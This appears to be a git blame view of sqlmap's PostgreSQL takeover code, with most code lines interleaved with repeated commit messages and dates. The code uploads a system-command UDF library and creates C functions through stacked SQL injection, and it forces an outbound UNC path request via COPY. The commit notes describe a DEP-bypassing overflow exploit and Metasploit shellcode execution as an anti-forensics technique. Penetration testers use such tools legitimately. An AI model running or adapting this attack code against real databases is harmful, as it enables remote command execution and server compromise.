sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
if confirm:
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
self.askCheckWrittenFile(wFile, dFile, fileType)
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
inject.goStacked("SELECT lo_unlink(%d)" % self.oid)
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
def udfSetRemotePath(self):
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
# On Windows
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
if kb.os == "Windows":
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
# The DLL can be in any folder where postgres user has
# read/write/execute access is valid
# NOTE: by not specifing any path, it will save into the
# data directory, on PostgreSQL 8.3 it is
# C:\Program Files\PostgreSQL\8.3\data.
self.udfRemoteFile = "%s.%s" % (self.udfSharedLibName, self.udfSharedLibExt)
# On Linux
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
else:
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
# The SO can be in any folder where postgres user has
# read/write/execute access is valid
self.udfRemoteFile = "/tmp/%s.%s" % (self.udfSharedLibName, self.udfSharedLibExt)
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
def udfCreateFromSharedLib(self, udf, inpRet):
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
if udf in self.udfToCreate:
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
logger.info("creating UDF '%s' from the binary UDF file" % udf)
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
inp = ", ".join(i for i in inpRet["input"])
ret = inpRet["return"]
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
# Reference: http://www.postgresql.org/docs/8.3/interactive/sql-createfunction.html
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
inject.goStacked("DROP FUNCTION %s" % udf)
inject.goStacked("CREATE OR REPLACE FUNCTION %s(%s) RETURNS %s AS '%s', '%s' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE" % (udf, inp, ret, self.udfRemoteFile, udf))
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
self.createdUdf.add(udf)
else:
logger.debug("keeping existing UDF '%s' as requested" % udf)
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
def udfInjectCmd(self):
self.udfLocalFile = paths.SQLMAP_UDF_PATH
self.udfSharedLibName = "libsqlmapudf%s" % randomStr(lowercase=True)
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
self.getVersionFromBanner()
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
banVer = kb.bannerFp["dbmsVersion"]
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
Added support for takeover functionalities on PgSQL 8.4 running on Windows
2010-01-14 04:40:11 +03:00
if banVer >= "8.4":
majorVer = "8.4"
elif banVer >= "8.3":
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
majorVer = "8.3"
Added support for takeover functionalities on PgSQL 8.4 running on Windows
2010-01-14 04:40:11 +03:00
elif banVer >= "8.2":
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
majorVer = "8.2"
Added support for takeover functionalities on PgSQL 8.4 running on Windows
2010-01-14 04:40:11 +03:00
else:
errMsg = "unsupported feature on versions of PostgreSQL before 8.2"
raise sqlmapUnsupportedFeatureException, errMsg
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
if kb.os == "Windows":
self.udfLocalFile += "/postgresql/windows/%s/lib_postgresqludf_sys.dll" % majorVer
self.udfSharedLibExt = "dll"
else:
self.udfLocalFile += "/postgresql/linux/%s/lib_postgresqludf_sys.so" % majorVer
self.udfSharedLibExt = "so"
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
Merged back from personal branch to trunk (svn merge -r846:940 ...) Changes: * Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (--os-bof) to automatically bypass DEP memory protection. * Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. * Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. * Added options for MySQL and PostgreSQL to inject custom user-defined functions. * Added support for --first and --last so the user now has even more granularity in what to enumerate in the query output. * Minor enhancement to save the session by default in 'output/hostname/session' file if -s option is not specified. * Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. * Minor bugs fixed. * Major code refactoring.
2009-09-26 03:03:45 +04:00
self.udfInjectCore(self.sysUdfs)
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
def uncPathRequest(self):
sqlmap 0.8-rc3: Merge from Miroslav Stampar's branch fixing a bug when verbosity > 2, another major bug with urlencoding/urldecoding of POST data and Cookies, adding --drop-set-cookie option, implementing support to automatically decode gzip and deflate HTTP responses, support for Google dork page result (--gpage) and a minor code cleanup.
2010-01-02 05:02:12 +03:00
self.createSupportTbl(self.fileTblName, self.tblField, "text")
Updated to sqlmap 0.7 release candidate 1
2009-04-22 15:48:07 +04:00
inject.goStacked("COPY %s(%s) FROM '%s'" % (self.fileTblName, self.tblField, self.uncPath), silent=True)
self.cleanup(onlyFileTbl=True)
Reference in New Issue Copy Permalink